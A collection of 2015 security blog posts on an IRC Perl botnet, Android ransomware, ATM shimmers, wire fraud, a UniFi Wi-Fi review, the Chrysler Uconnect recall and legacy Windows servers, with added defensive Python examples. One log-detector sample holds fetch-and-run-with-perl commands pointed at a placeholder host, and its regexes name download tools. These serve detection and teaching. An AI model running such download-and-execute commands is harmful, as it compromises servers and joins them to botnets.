Got Linux – great! – here is another bot script just for you
I have seen some activity recently in a honeypot I run that shows automated scanning for Apache. The intent of this automated scan seems to be to seek out Apache servers and join them to an IRC botnet using Perl. (For those of you unfamiliar with these terms, I attempt to define them below.)
Honeypot (a computer that is intentionally set up as a decoy, impersonating commonly used services such as Apache for a web server or MySQL for a database, so that attacks against it can be observed without putting real systems at risk)
Botnet (a collection of compromised computers under the remote control of one or more operators, who use them to launch attacks, send spam, etc.; once your machine has joined one it is working for someone else)
In my research I observed an attempt to run a script hosted on a server in Spain (7soles.com); the script is downloaded from the website and then executed using Perl, and it can provide a host of services including flooding attacks and spam.
For those of you still reading, I have included the link to the script here. It's not rocket science, but it looks like a nicely tested platform, resembling point-and-click malware that uses Internet Relay Chat (IRC) as its command and control channel. It also looks like it is currently designed to report in to a site in Germany.
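The scans described above leave a recognisable trace in the web server's own logs: a request (or a User-Agent or Referer header) carrying a "fetch this URL, then run it with perl" payload. The following detector is an added example written for this post, not code from the honeypot or from the bot script; the log lines are constructed (documentation IP ranges and the reserved name example.invalid), and the regexes are a generic pattern for download-and-execute attempts rather than a signature for any one campaign.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-format log lines for illustration only (not the
# honeypot's real data). 203.0.113.0/24 and 198.51.100.0/24 are documentation
# ranges; example.invalid is a reserved name that never resolves.
SAMPLE_LOG = """\
198.51.100.7 - - [12/Aug/2015:03:14:01 +0000] "GET /contact.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
203.0.113.10 - - [12/Aug/2015:03:14:09 +0000] "GET /index.php?page=http://example.invalid/id.txt?cmd=cd%20/tmp;wget%20http://example.invalid/bot.pl;perl%20bot.pl HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Aug/2015:03:15:30 +0000] "GET /docs/perl-tutorial.html HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
203.0.113.22 - - [12/Aug/2015:03:16:44 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 77 "-" "curl%20http%3A%2F%2Fexample.invalid%2Fb.pl%7Cperl"
"""

# Apache "combined" format: ip ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<ref>[^"]*)" "(?P<ua>.*)"$'
)
# A download tool pulling a remote URL ...
FETCH_RE = re.compile(r"""\b(wget|curl|fetch|lwp-download|lynx)\b[^;|&\n]*?https?://[^\s;|&"']+""", re.I)
# ... and a perl invocation somewhere in the same field.
PERL_RE = re.compile(r"\bperl\b", re.I)


def fully_decode(value, rounds=3):
    """URL-decode repeatedly so double-encoded payloads (%2520 -> %20 -> space) are normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_download_exec(log_text):
    """Return one hit per log line whose request, referer or user-agent field
    contains a fetch-a-URL-then-run-perl pattern.

    Each hit is (client ip, field name, decoded field). A line is reported at
    most once, on the first field that matches."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format; a real pipeline would count and surface these
        for field in ("req", "ref", "ua"):
            decoded = fully_decode(m.group(field))
            if FETCH_RE.search(decoded) and PERL_RE.search(decoded):
                hits.append((m.group("ip"), field, decoded))
                break
    return hits


def suspicious_ips(log_text):
    """Distinct client addresses worth blocking or investigating, sorted."""
    return sorted({ip for ip, _, _ in find_download_exec(log_text)})


if __name__ == "__main__":
    for ip, field, payload in find_download_exec(SAMPLE_LOG):
        print(f"{ip}\t{field}\t{payload}")
```

Decoding every field before matching is the important step: the payload in the fourth sample line is entirely percent-encoded and would slip past a pattern applied to the raw line. Requiring both a fetch tool and a perl invocation keeps a page about Perl documentation (third line) from being flagged.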
For most of my contemporaries this is old news but for the rest of you, welcome to the new Internet. Looks a lot like any North American city in the downtown core – watch your purse and get a carry permit for a handgun.
It's the FBI and we have your phone surrounded…
Just when you thought it was safe to use your Android smartphone, there are several vulnerabilities you should be aware of (great, now I need to monitor and patch my cell phones too? Yes, Virginia, just one more thing you need to do this week).
There are reports of connections to command and control (C2) servers located in Canada and Germany from a new piece of Android ransomware that impersonates the FBI. Claiming to have detected pornographic images on your phone, the message asks you to pay a $500 fine and, as "proof", shows you a picture of yourself (taken with the front-facing camera) along with the phone's Internet IP address (everyone has a data plan nowadays, right?).
It wakes the device from idle and reports in to the C2 every minute with no visible sign that it is doing so (the extra polling costs power, though, so you might notice that your battery life has become quite poor). It also gives the attackers a backdoor through which they can connect to your device.
Read more about it here – http://blog.fortinet.com/post/locker-an-android-ransomware-full-of-surprises
Edit: This is just another variant of the same ransomware family reported earlier this year (see here). Unfortunately there is no anti-virus for mobile phones that has heuristic scanning, so don't rely on anything you have installed to protect you from these types of attacks.
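A check-in "every minute" is exactly the kind of behaviour you can see from outside the phone, on the Wi-Fi router or firewall logs, without any mobile anti-virus at all: a timer-driven beacon produces connection intervals that are far more regular than anything a person browsing generates. The following is an added example written for this post, not code from the Fortinet analysis or from the malware; the connection records are constructed (documentation address ranges) and the 60-second period merely mirrors what the post describes.

```python
import statistics
from collections import defaultdict


def make_sample_connections():
    """Constructed outbound connection records (seconds since capture start,
    source address, destination address:port). Not real traffic from the
    ransomware in the post; 192.0.2.0/24 and 198.51.100.0/24 are documentation ranges."""
    records = []
    # An infected handset checking in with its C2 roughly every 60 s (a little jitter).
    for i in range(20):
        records.append((i * 60 + (i % 3), "10.0.0.5", "192.0.2.50:80"))
    # The same handset browsing normally: irregular gaps between connections.
    for t in (3, 17, 19, 140, 141, 402, 900, 955):
        records.append((t, "10.0.0.5", "198.51.100.20:443"))
    # Another device that only talked to the same server twice.
    for t in (10, 600):
        records.append((t, "10.0.0.9", "192.0.2.50:80"))
    return sorted(records)


def find_beacons(records, min_count=8, max_cv=0.2):
    """Group connections by (source, destination) and flag pairs whose
    inter-connection intervals are both frequent and regular.

    cv is the coefficient of variation (stdev / mean) of the intervals: human
    browsing is bursty (cv well above 1), while a timer-driven check-in is nearly
    constant (cv close to 0). Returns {(src, dst): (count, mean_interval, cv)}.
    """
    by_pair = defaultdict(list)
    for ts, src, dst in records:
        by_pair[(src, dst)].append(ts)

    beacons = {}
    for pair, times in by_pair.items():
        if len(times) < max(min_count, 3):   # need at least two intervals for a stdev
            continue
        times.sort()
        intervals = [later - earlier for earlier, later in zip(times, times[1:])]
        mean = statistics.mean(intervals)
        if mean <= 0:
            continue
        cv = statistics.stdev(intervals) / mean
        if cv <= max_cv:
            beacons[pair] = (len(times), mean, cv)
    return beacons


if __name__ == "__main__":
    for (src, dst), (count, mean, cv) in find_beacons(make_sample_connections()).items():
        print(f"{src} -> {dst}: {count} connections every ~{mean:.0f}s (cv={cv:.3f})")
```

The thresholds are deliberately loose: a phone that polls a legitimate push service will also look periodic, so treat a hit as a reason to look at the destination, not as proof of infection. Raising min_count trades detection delay for fewer false alarms.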
Security industry reacts to Oracle’s CSO missive | CSO Online
Ever wonder where we will all be in 5 or 10 years? I would never have seen this coming. I mean, this could be an example of professional hubris: read about how the chief security officer at Oracle thought it was time to tell its users to play nicely or "we will take our wagon away from you".
This is just a glimpse of the next version of the end user license agreement (EULA) that we all click through before using the software it was written for. Judging from the industry reaction it could be a little ways off before a large company like Oracle tries to flex its muscles, but mark my words: forbidding customers from reverse engineering software to find holes will likely lead us back to a time before open source. Companies should embrace open architecture and provide a rich bug bounty program if they do not have the talent in-house to keep up with demand.
Read more in the article below, and check out the archive of the post from before it was pulled off the site.
Just when you thought it was safe to be a Canadian…
Mexicans are fast on their way to mastering the art of ATM fraud, which, ironically, is fortunate for Americans, who are still behind the times when it comes to chip and PIN credit cards. I, for one, was happy to extol the benefits of chip cards until I read this story.
ATM ‘Shimmer’ Found in Mexico http://krebsonsecurity.com/2015/08/chip-card-atm-shimmer-found-in-mexico/
Someone has now built a skimming device that reads the chip rather than the magnetic stripe we all used to see and hear about. It is thin enough to sit inside the ATM's card slot, so you may never know that it is there! As the Krebs article notes, the data it records cannot be used to make a working chip clone, but it can be enough to produce a magnetic-stripe clone if the card issuer does not properly verify the chip-specific security code (the iCVV) when a stripe transaction comes in.
So much for chip and pin technology – what are we going to do now?
And now for something completely different…
More than 35 years ago Jeff Wayne prophesied the end of the world, as told by the great Richard Burton in his musical version of The War of the Worlds. Who would have guessed that the Perseids meteor shower would be at its greatest tonight, August 12? (perseids-2015)
For those of you who have not heard the musical the story goes something like this…
“..at midnight on the 12th of August a huge mass of luminous gas erupted from Mars and sped toward earth. Across 200 million miles of void, invisibly hurtling towards us came the first of the missiles that were to bring so much calamity to earth.”
Shout out to all those Armageddon peddlers – maybe tonight really does mark the beginning of the end of the world… End of the World
Ubiquiti breach a few months back…
http://www.sec.gov/Archives/edgar/data/1511737/000157104915006288/t1501817_8k.htm
In this Securities and Exchange Commission filing, Ubiquiti Networks reports a breach in which outside parties impersonated employees and sent fraudulent payment requests to its finance department, resulting in transfers of almost US$47 million to overseas accounts.
After noticing the theft and contacting the necessary parties they were able to recover some of it, but over US$30 million remains missing.
More for companies to worry about as the criminals shift from stealing data to stealing cold hard cash. Note that this kind of fraud (business email compromise) exploits people and payment processes as much as networks: out-of-band verification of any new or changed payment instructions and dual approval of large wire transfers are the controls that stop it. It's time to get your computer networks, and your finance procedures, in good order, or you too can suffer the wrath.
Test drive – Ubiquiti UniFi AP – Enterprise Wi-Fi for SOHO
Ubiquiti has produced a very nice range of access points that are quite affordable for the home user. Sure, you can get away with a consumer-grade router that includes Wi-Fi, but those of us who are a little more concerned with security, have several devices and want a multi-AP deployment need to consider a separate solution.
For just over $300.00 we Canadians can have three Ubiquiti access points (model UAP), each capable of creating or extending Wi-Fi in your home up to a maximum radius of approx. 400 ft (YMMV: solid objects such as concrete and walls, as well as electrical wiring, can interfere and reduce your effective coverage area). Installation can be as simple as putting an AP on each floor, in various sections of your home.
You can even add an outdoor AP (shown in our representation below) to your installation and extend the same unified wireless network into your backyard. 
UniFi APs allow you to have up to four networks (SSIDs) broadcast from the same access points, so you can create one for your phones, one for your kids, one for your guests, anything you wish. Keep in mind that separate SSIDs only separate traffic if each one is tagged onto its own VLAN and the router enforces rules between those VLANs; otherwise every SSID lands on the same LAN. That is where the EdgeMax router product (additional cost as low as $150.00) comes in: it lets you manage security, bandwidth and Internet access between those networks without any other products.
All you need is the 3-pack of wireless APs, an EdgeMax router and an Internet connection, and for under $500.00 you can have full-speed wireless all over your home or office for up to 100 concurrent clients (YMMV).
But wait, there is more. When you install the controller software on a beefy PC (either dedicated or shared as your primary PC) you get reporting (Insights)! Imagine monitoring your usage, your kids' usage, your guests' usage and even those drive-by hackers who might be trying to break in and steal your bandwidth (long passphrases make good neighbours :-)). You can set up alerts to email you whenever a device fails authentication or goes over a bandwidth cap.
The UniFi controller runs on Java, so be sure to install it and keep it up to date; an out-of-date Java runtime causes problems with the controller and is a security liability in its own right. After you open the controller application you will get a link like this.
Once the application has loaded, click the link inside the splash screen to open the management console (you can also launch it by browsing to https://localhost:8443/). I selected the existing AP I had, it indicated that an upgrade was available, and I clicked Upgrade to apply the newest firmware to my existing access point. This makes it easy to keep the APs patched and secure.
The management controller software comes with its own hotspot feature, so a home office or small business can deploy it quickly and give guests a one-time Internet voucher that lasts a minimum of 8 hours, or up to a user-configurable period. This lets reception or other staff control access to Internet resources and helps avoid the voucher being reused later once the office is closed. Personally, I think a shared guest passphrase is too easy a way to get back onto a network after visiting a site: most homes and companies seldom change the passphrases on their own networks and rarely use guest networks at all.
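What makes a hotspot voucher better than a shared passphrase is a handful of properties: the code is unguessable, it expires, and it can only be used once. The following is an added example, written for this post, of how such a voucher store works; it is not the UniFi controller's code, and the 10-symbol code length, the client-MAC binding and the injectable clock are design choices of the example rather than anything the product documents.

```python
import hashlib
import secrets
import time

VOUCHER_TTL_HOURS = 8   # minimum voucher lifetime, matching the post's description
# 32 symbols with 0/O and 1/I removed so a code can be read off a printed slip.
VOUCHER_ALPHABET = "23456789ABCDEFGHJKLMNPQRSTUVWXYZ"
VOUCHER_LENGTH = 10     # 10 symbols from 32 = 50 bits; not guessable from the parking lot


class VoucherStore:
    """Single-use guest vouchers (illustrative, not the UniFi controller's implementation).

    - codes come from a CSPRNG (the secrets module), never from a counter or a timestamp
    - only a SHA-256 digest of each code is kept, so a leaked store is useless
    - a voucher expires after its TTL and is bound to the first client that uses it
    """

    def __init__(self, ttl_hours=VOUCHER_TTL_HOURS, now=time.time):
        self.ttl = ttl_hours * 3600
        self.now = now                      # injectable clock, handy for testing expiry
        self._vouchers = {}                 # digest -> [expires_at, bound_client]

    @staticmethod
    def _digest(code):
        return hashlib.sha256(code.encode("ascii")).hexdigest()

    def issue(self, hours=None):
        """Create a voucher valid for max(TTL, hours) and return the plain code once."""
        code = "".join(secrets.choice(VOUCHER_ALPHABET) for _ in range(VOUCHER_LENGTH))
        lifetime = max(self.ttl, (hours or 0) * 3600)
        self._vouchers[self._digest(code)] = [self.now() + lifetime, None]
        return code

    def redeem(self, code, client_mac):
        """Return 'ok', 'invalid', 'expired' or 'already_used'."""
        entry = self._vouchers.get(self._digest(code.strip().upper()))
        if entry is None:
            return "invalid"
        expires_at, bound_client = entry
        if self.now() > expires_at:
            return "expired"
        if bound_client is not None and bound_client != client_mac:
            return "already_used"
        entry[1] = client_mac               # first redemption binds the voucher to this device
        return "ok"

    def purge_expired(self):
        """Drop expired entries; returns how many were removed."""
        now = self.now()
        dead = [d for d, (expires_at, _) in self._vouchers.items() if now > expires_at]
        for d in dead:
            del self._vouchers[d]
        return len(dead)


if __name__ == "__main__":
    store = VoucherStore()
    code = store.issue()
    print("hand this to the guest:", code)
    print(store.redeem(code, "aa:bb:cc:dd:ee:01"))   # ok
    print(store.redeem(code, "aa:bb:cc:dd:ee:02"))   # already_used
```

Binding the voucher to the first client rather than marking it dead on first use lets a guest's device drop off and reconnect during its stay, while still refusing a second device that has been handed the same slip.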
I think this is a great mid-range product line that can help most home owners and small business users deploy wireless safely and effectively without exposing their systems to hackers.
Own a new Chrysler? Well, a hacker could take control of your car while you are driving it!
The date is July 29, 2015. Imagine someone miles and miles away with a laptop, a cell phone and some malicious software. You are driving along with your kids on a summer vacation when suddenly the radio tunes itself to a new station and all of a sudden you lose control of your vehicle and crash!
Does this sound like a page from The Twilight Zone? Well it's not; it's real. Earlier this month Chrysler confirmed a vulnerability in the Uconnect radios fitted to many of its cars and trucks since model year 2013 (almost 1.4 million vehicles) and issued a recall under the National Highway Traffic Safety Administration (NHTSA), campaign number 15V-461.
Click to access RCRIT-15V461-7681.pdf
I perused this document, which was designed to help dealers fix this vulnerability, and I am not exactly sure that most of us would be able to do this. You should keep in mind that flashing firmware can leave any device in a state where it will not function.
For those who feel bold enough to try it there are instructions on how to do it yourself, but if you are like me and would rather take the time to get it done by the dealer, imagine for a moment that some mechanic at your dealership takes a USB drive that flashes one car and decides to use it over and over again. What if someone had managed to plant a Trojan in your radio before you, or someone like you, got around to taking the vehicle in for the fix? If the mechanic reuses that USB drive after it has been plugged into a compromised radio, your car could get hacked again, and maybe this time it is even worse.
Security is something that we all take for granted. Gone are the days when the government could protect you from safety and health issues when it comes to computers. We have too many devices now, and in our haste to computerize everything, safety has fallen out of scope.
We, as a society, need to demand that our governments legislate security into our products and cloud-based services, with legislative oversight, mandatory compliance and testing (remember when automotive insurance and seat belts were voluntary?). Until then, we are all left to fend for ourselves. Get ahead of the learning curve and educate yourself on how to avoid getting hacked. Think about safety when it comes to using the Internet and computers of any kind. After all, we are now living in the future…
Drones: not just for launching missiles anymore?
Wow, it didn't take long to discover that the US government could do more with those unmanned aerial vehicles than just bomb targets: why not use them to deliver malware too?
Boeing and Hacking Team want drones to deliver spyware
http://www.engadget.com/2015/07/18/boeing-and-hacking-team-spyware-drones/?ncid=rss_truncated
Going, going, gone – that's all for Windows Server 2003.
Well, this past Tuesday marked a very special Patch Tuesday, and it appears to have passed without the sky falling (unlike last year's final Windows XP Patch Tuesday). If you have had your head buried in the sand you may not be aware, but July 14, 2015 was the very last day that Microsoft would send out patches for your Windows Server 2003 machines.
With the official death of all Windows 5.x kernels (2000, XP and Server 2003), you may be interested to know that there are still several working exploits for these machines, which matters if you still find yourself needing to use them. If you must keep them running, inventory the traffic to and from them so you can tell whether they are being actively exploited, and restrict that traffic to the few sources that genuinely need it.
Early last year Microsoft released MS14-002 for a previously unknown bug (CVE-2013-5065, a kernel-mode privilege escalation in the NDProxy driver on XP and Server 2003) that was being actively exploited in combination with an Adobe Reader vulnerability, CVE-2013-3346. Without that patch there would be millions of machines still vulnerable. HP has estimated that there were approx. 11 million of these systems in the market, so unless you are one of the companies that migrated to a newer version of Windows Server you are probably exposed to the next attack. Without paying Microsoft for custom support to get access to patches if and when they create them, you could, and probably will, be attacked.
There is still a concern for businesses that only use Windows Server 2003 on their internal network. It still represents a risk to your organization when an intruder is pivoting (using one compromised computer or device to reach others). You should also consider an insider attack, whether willful or not. I always suggest to my clients that they not discount a disgruntled employee attacking their network, but bring-your-own-device (BYOD) laptops, tablets and smartphones can also be used successfully to launch an attack once they are inside your network.
Consider this: you travel to a hotel on business and connect to the hotel Wi-Fi network. Free Wi-Fi has become a necessity for hotels, yet the infrastructure generates no revenue, so the last thing they can afford is to monitor and maintain those devices, and they become an attack surface for hackers to exploit. Your wireless device silently becomes the victim of malware designed to search for other computers. When you come back from your trip you pass right by security and connect to your home or business network. It's like smuggling your attacker in through the back door and giving them full access to your network.
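Inventorying the traffic that reaches a legacy server, and catching a laptop on the guest or BYOD network that starts poking at it, is the concrete version of the advice above. The following is an added example written for this post, not a tool the author uses; the legacy host list, the allowed and untrusted address ranges, and the flow records are all constructed (private and documentation address space), and the record layout stands in for whatever your firewall or NetFlow collector exports.

```python
import ipaddress
from collections import Counter, defaultdict

# Hypothetical inventory: the Windows Server 2003 hosts you could not retire yet.
LEGACY_HOSTS = {"10.10.5.20", "10.10.5.21"}
# Networks that legitimately manage or use them (admin jump hosts, the server VLAN).
ALLOWED_SOURCES = [ipaddress.ip_network("10.10.1.0/24"), ipaddress.ip_network("10.10.5.0/24")]
# Guest / BYOD / wireless space: nothing here should ever touch a legacy server.
UNTRUSTED_SOURCES = [ipaddress.ip_network("10.20.0.0/16")]
PORT_NAMES = {445: "SMB", 139: "NetBIOS", 3389: "RDP", 135: "RPC", 80: "HTTP"}
SEVERITY = {"untrusted": "high", "unknown": "medium"}

# Constructed flow records (timestamp, src, dst, dst port, bytes); not real traffic.
SAMPLE_FLOWS = [
    ("2015-07-15T09:00:01", "10.10.1.5", "10.10.5.20", 3389, 40960),  # admin RDP from jump host
    ("2015-07-15T09:02:10", "10.10.5.30", "10.10.5.21", 445, 2048),   # app server to file share
    ("2015-07-15T12:41:33", "10.20.3.77", "10.10.5.20", 445, 120),    # BYOD laptop probing SMB
    ("2015-07-15T12:41:34", "10.20.3.77", "10.10.5.21", 445, 120),
    ("2015-07-15T12:41:35", "10.20.3.77", "10.10.5.21", 135, 96),
    ("2015-07-15T13:05:00", "10.10.7.14", "10.10.5.20", 80, 5120),    # workstation on an unlisted VLAN
    ("2015-07-15T13:10:00", "10.10.8.9", "10.10.8.10", 80, 5120),     # not a legacy host, ignored
]


def classify_source(src):
    """'allowed', 'untrusted' or 'unknown' (on the network but not on either list)."""
    addr = ipaddress.ip_address(src)
    if any(addr in net for net in ALLOWED_SOURCES):
        return "allowed"
    if any(addr in net for net in UNTRUSTED_SOURCES):
        return "untrusted"
    return "unknown"


def service_name(port):
    return PORT_NAMES.get(port, f"tcp/{port}")


def inventory(flows):
    """Per legacy host: Counter of (source, service) -> flow count.

    This is the 'who talks to the box, and how' baseline you need before you can
    write a firewall rule that allows only those pairs."""
    inv = defaultdict(Counter)
    for _ts, src, dst, dport, _nbytes in flows:
        if dst in LEGACY_HOSTS:
            inv[dst][(src, service_name(dport))] += 1
    return inv


def findings(flows):
    """Every (source, service) pair reaching a legacy host from outside the allowed
    networks, as sorted (severity, src, dst, service) tuples, deduplicated."""
    out = set()
    for dst, talkers in inventory(flows).items():
        for src, service in talkers:
            cls = classify_source(src)
            if cls != "allowed":
                out.add((SEVERITY[cls], src, dst, service))
    return sorted(out)


if __name__ == "__main__":
    for dst, talkers in inventory(SAMPLE_FLOWS).items():
        print(dst, dict(talkers))
    for severity, src, dst, service in findings(SAMPLE_FLOWS):
        print(f"[{severity}] {src} -> {dst} ({service})")
```

Run this over a day or two of flows before touching the firewall: the "unknown" findings are usually forgotten dependencies you need to either add to the allowed list or retire, while "high" findings from the guest or BYOD range are exactly the pivot the hotel scenario describes and warrant pulling the device off the network.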
Remember the Critical Security Controls (the "top 20") and monitor your networks; you never know who might be lurking in the shadows…